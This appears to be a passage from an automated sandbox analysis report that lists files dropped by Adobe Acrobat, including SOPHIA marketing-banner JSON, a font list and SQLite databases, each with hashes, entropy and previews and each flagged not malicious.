SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.379229345956442
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJM3g98kUwPeUkwRe9:YvXKXE2H0W4lZc0vcJGMbLUkee9
MD5:	9A2B1E337F2CA9E4F238B61E436EA093
SHA1:	4C52F0A5E263C3CFA771D3297315D7DE065C5BBC
SHA-256:	19FAB2A4144E71F78E09A1B8DF87901E14C86030DFC551E38182C4EDD06D6F74
SHA-512:	064D73D2082242F63FE85204C4F46ED35A662033FF623E47C11B8766DD0FE66E52CB5A8AAF676442E02FF3377F28F773E2C8672BB4444B7D2754131FDCD3B831
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.328574503707592
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfBoTfXpnrPeUkwRe9:YvXKXE2H0W4lZc0vcJGWTfXcUkee9
MD5:	2CAD1479A97FA0B0BDC57DD6649D3626
SHA1:	7700AB573F43596D659E689569F54B9E66A52E43
SHA-256:	46DDB0A368990F7BF56E7EA31D8B02146C80F198E792C58B37255A37C0321903
SHA-512:	266094F6A4944C5AC36E34743A122C88BEC94C05625BACF9E040ABE329CE23D95DB5BE8F74C7AF8BD13B72125DE27AA6EFB57F82854AD9E1A3CEFF506DC9F0FC
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.307842297622261
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfBD2G6UpnrPeUkwRe9:YvXKXE2H0W4lZc0vcJGR22cUkee9
MD5:	EA5E68EAA20474BDD93A3AFACAE37B31
SHA1:	C2794F1B2A675C9162DFEE881B4C122FFF5B3243
SHA-256:	257317DC38925E719008CB4748D5E4D54342EF11565EF06D8F2DCF491D3FB1B9
SHA-512:	8628F9C7676A1933006E29E1CBD7D7D2B636C3EE0DFBB5EC3DDE55869B9A5F4DC289C0A9BD0DE132371306AE394553489A6AB2A005F1F72CF17DD236181E5888
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.36679655248982
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfPmwrPeUkwRe9:YvXKXE2H0W4lZc0vcJGH56Ukee9
MD5:	4EA6F3BCCEE1E0A412AF863DBA5840C3
SHA1:	E9826ABCA1DF3083C0D485EB021D5CDD55FB67FD
SHA-256:	2A1BF93F1E5346D7856B89079FD79CD966D2C3C5FF7795B616955C534BF77543
SHA-512:	AAC9ECAE32A710FB359F8C821A46DD6DF9A0F780EDE5A940C76C4C143F0F94B66A8615B9A59670BF01841F962E845CFF21194D47F3BAE9D470794C473AA76010
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.6872395860272205
Encrypted:	false
SSDEEP:	24:Yv6XB/4lzvcOpLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:Yvo/4Jbhgy6SAFv5Ah8cv/r
MD5:	A7659DF78F9BC079BD5F07B45EB8E5C6
SHA1:	E3BEF9AF6F5B9FB1F4FDF337F7EA1E960D487199
SHA-256:	BDBAEDCF0CB507930969275519E9B6EC2541C427A5EE9B8B0F4012F7AD7613C9
SHA-512:	4B25ED4E9DE9010523099752F64555361F4D858A4E2DB9E6E887BDFD76CBF6FD6C0A41000A2168294071A57A433270082AB0E016E5C2F85A95CA62DD2856FB64
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.31151767312073
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJf8dPeUkwRe9:YvXKXE2H0W4lZc0vcJGU8Ukee9
MD5:	A9959F9E6F5859EC744F2EDA2DBB7AE7
SHA1:	A2D64F3734B7F0B1C800576E067CE099D42B8059
SHA-256:	6C85AC3B81A1914CF07B1AB7C11B7BA9D9A357BC7CAE8E60AAC141BC8CDC727B
SHA-512:	DF604C02F9564D6E1CDBF2717B8DA2656450C3C9E37B1B584DFB86069E8B5E5D768D1B2501CD1A5D8FB55441B03B8D7F8A9E385E1FF21B043DE999974020D371
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.314716352376893
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfQ1rPeUkwRe9:YvXKXE2H0W4lZc0vcJGY16Ukee9
MD5:	AD9C12E7E6857859FF13D9D13FD893B9
SHA1:	2EE57251C8538FD1B443FA412DEE84A44D160817
SHA-256:	5F2811377D6514DF14C1E0DD7FC51061F1CD17C7960ACA54CA33E986D3FBC820
SHA-512:	DCAB2728BADE437DF84BA4560AAA38E528F80C562C3C25B03BF568596FCE5C91D6ED457BF79D4EFEE1463ADAFEEC07535904425ABE45BF1EF8613857A38222FA
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.319484820014023
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfFldPeUkwRe9:YvXKXE2H0W4lZc0vcJGz8Ukee9
MD5:	7453E6C73059F818F82DA5F8D9967DBF
SHA1:	1DBE322FE4004EF976B6E5CF1BF67E991699FEAC
SHA-256:	53108D2A171B5E46FBDA0BF97C71D9A16BFCBB3EC6DAF06408AE6F846F3E7A53
SHA-512:	6E8EDD08D500F13FF43A1957DB6E42D44DB70EC1A53FF440E9792CD29E0FF74317DDDCE4193CBA92EE7C4A4B19EEAB9D03A377DD93235698AADD622D803B5901
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.336328697853562
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfzdPeUkwRe9:YvXKXE2H0W4lZc0vcJGb8Ukee9
MD5:	88294CC5D6BCC780265E25354ED84889
SHA1:	FD49D2EDDC0AB9DA22FDB3E3E9A3F7937D130844
SHA-256:	8A8E1304BB2D0F77F83C3F234D83AAF2197A99426E38DB15897020E185CD0983
SHA-512:	A85C6B2E4C0179C7C2AB626B842649DF1A765B9FC4FDEFA55BD7B3BEE5E1ACAF524B20A759F5651DE969D85FBB644CBF6822E1125BFDAB566EBA03B5D1441B24
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.3170308386831655
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfYdPeUkwRe9:YvXKXE2H0W4lZc0vcJGg8Ukee9
MD5:	54264E938A03DEC47197777B07C8E964
SHA1:	5AECC552A6389462D82E9FDD81212213ED048D89
SHA-256:	17525C2FFD2F5853DB44528FD746380F43154258DE103F2722D122091893DBAF
SHA-512:	2108B487DDF44AE10980CC733A8C99CE7FD021A62DAD8B6842444AA9739FB67FF709E1ABAE59B9A689C5892133EB12F336DE1763F824E2F3E557A3285E105611
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.303962403835709
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJf+dPeUkwRe9:YvXKXE2H0W4lZc0vcJG28Ukee9
MD5:	689F72F2F10E9BDB54037AC4B1071B35
SHA1:	875CAC07BA4AC6383C18C6BB6C22F7AC5A9E5DC6
SHA-256:	3356CC8A01DA21CBCDE265A2891AB7C1429EEFD6ACB0F75871C160B93B76FBBD
SHA-512:	A5690ADC41B43CC64D8DA10C7E812B30D9F28F26FF9C45AF39F2F0D1D73D098AEFE6355BC08D1E57F0D40D211002780323A8176ABE5F6367FC6F9BE57BF087F1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.300460885919344
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfbPtdPeUkwRe9:YvXKXE2H0W4lZc0vcJGDV8Ukee9
MD5:	204B2BFFCFF664B2455A425762B016E1
SHA1:	7FC7D12882AE70E816E6D560734CE0744F6A8EC2
SHA-256:	CA604A799A6427E9770441EF1B8CA2F92E140ABFDE16E080F0B0A47ACCEBB8AB
SHA-512:	0D2BF30E9E00589B01883090EF5EF3A5B8B98E9BA0DDFFB80003D072077692892C5805EB1DAB5ABB2E47FCAEE518D322370581CF9EBADE579D39E7DC5C322B25
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.305033690184831
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJf21rPeUkwRe9:YvXKXE2H0W4lZc0vcJG+16Ukee9
MD5:	CBD55402356CE8D5D2D471590308B2DC
SHA1:	D62BDD0B88BCAF3686EFC55E613E557022DF9B43
SHA-256:	84DA3DD1CF2BF966650F437A7D9D8023A10BFEA0344E98DB62195AA51B20D3D6
SHA-512:	9EBD673D3065A92676A9D2A8DADC81E55BBAD51447A53EF21072F007FDE4A64B95183EC32930A42E1FAEFA39DE5F5D9C20D5487A4B41D31B46BB96B665667625
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.665068776472102
Encrypted:	false
SSDEEP:	24:Yv6XB/4lzvcSamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSr:Yvo/4JrBgkDMUJUAh8cvMr
MD5:	53C02E6362E2587A8480BB239406776F
SHA1:	B90E67DD7BA735DE6181FD23E0CC8EDF510D6FAD
SHA-256:	E41AFF944509E6284422CC3A9BA68A6A6E3EFE49CF370CB3193D62E6AC26E812
SHA-512:	25A7B53009A2AF7F1EA3F24F0347950926BCA0211455E81BF71EB2F488634561166813B15D6D5CF1B9847C6F91ECE910E7AC402EB570D73584BD49990CDF7A44
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.2804851007102265
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJfshHHrPeUkwRe9:YvXKXE2H0W4lZc0vcJGUUUkee9
MD5:	5D2F0109AA857FD15DCF9F6DC79F5B14
SHA1:	92098BDCC690C2F4C118E1F831BCECDD660F24F1
SHA-256:	4B1F7E22340EB299A72FC85BC87B732FD785802B58A476411D78D8ED3BC4D28B
SHA-512:	44CC618A22B8357C95BCD576D78F93617909ED20BC659CA73063B86D82E4A722B03AF38E7D6D3536BBB6044D6FF4B94EABAB74F5AF81CA8AE18944E73B4BCD49
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.294803580480383
Encrypted:	false
SSDEEP:	6:YEQXJ2HXisu8RH0W4kVoZcg1vRcR0Y34PoAvJTqgFCrPeUkwRe9:YvXKXE2H0W4lZc0vcJGTq16Ukee9
MD5:	17D7792AC6A1E00D8CE913200C67D626
SHA1:	700EB9B8A141E9CD211DB772E900C8DA579EF484
SHA-256:	336C5DD58D3ADFFE905EB19316118E70DFD5095F667B6920136431AA7A638577
SHA-512:	5CF37542EE91A40E72B083DE5873062959C749CB7CFF679D64353C814C5501211CC68487B0E37B7BDC66B182621547EC5BBAD9C22155361D5DB112681693EC01
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"9483ebae-c919-49e8-8d63-d334f8d12b45","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736828816221,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.1434316333645365
Encrypted:	false
SSDEEP:	24:Y9B1haP2xAayFdBqtTLCDJx+Te3jNj0SNuWR24Jf2LSHCNBiPbB+Mm0G5KCb9tuS:YjEKaaKDP2Ghgyf1FsBijB+Jz93
MD5:	07C725A6A88D42BD67C68EDD5ECCD0BB
SHA1:	92F60540C1BF10DFF5C03835087C70EE40633E69
SHA-256:	400E5A1C51556BD28BE1EAD46A112E8E0E2AF4470F7883D7EE99BFFB20DE092B
SHA-512:	B8968D8922B9C0C5E08A0E83ABACDA393D95C805317BCFD16CBFEDD252D58E1D03931DB8DB98524F764F0EF99B3EB2BFAD620079C34FC29C235F22D9FBCB4D89
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"0c928fd79870ae3ae5ca9b0eb2d8cc15","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736651951000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"cd65459c68a050dcd0ad92c593a89716","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736651951000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f114611f841943865faa6e5dcf5b83a2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736651951000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1db4232404122fa41a93d803db89f9de","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736651951000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"cd43e3efd6bf22b9b77de494637a7e9f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736651951000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"0542064dff3fcc7f9b70abfa47803b3b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1885473270217457
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUUTSvR9H9vxFGiDIAEkGVvp/:lNVmswUUUUUUUUT+FGSItL
MD5:	92CAD166B4BADA81BA8A8B11C5AFF692
SHA1:	1E48F9F1F8F55B35306AA1C00573991BFE952661
SHA-256:	8D23201FB2B39E6CDA1B4468FED69FA8196C526120764935C90B313E6D75CADE
SHA-512:	E8F719D7104FED323DE702964A24A24E824A293F84B6EE27C4DBAB07111A780FB8DE7FB8961ABC4EB55015EC23333251236F6B8D794251A7C60E60CB77C39598
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6083233166599828
Encrypted:	false
SSDEEP:	48:7MTKUUUUUUUUUUXvR9H9vxFGiDIAEkGVvbqFl2GL7msI:7tUUUUUUUUUUvFGSItJKVmsI
MD5:	01E3D5F5ACCBCDE3CFAAD9ECC908326C
SHA1:	7F99E013FB1A9F0430750E8A47C70FDA36E919A1
SHA-256:	9919AB2B6AE56982899C18F5F8C3EC97D2F4C2C3608E60D331E9D126BDC13560
SHA-512:	DDC7089A0366D406776C4E9D9B67A959EA613D45A5C1D693FD104B812046F8717E24750F311441BAB001FCC19FEC645E7BA384768D690B341C7458F6700D8682
Malicious:	false
Preview:	.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgKObwEkGhjz/m79ld2abYXhqXmmUYyu:6a6TZ44ADEKuwEkG1zYlPmmUK
MD5:	FC54D7262931A96CFB5B1CE44824C43C
SHA1:	664232B5C3D51007E46C74E07BEB731FE14D2E29
SHA-256:	4CF1B76A3C78DFB884E887FE1FACD22D43E397F46F7E3AFB9B2F7D0601CF4A32
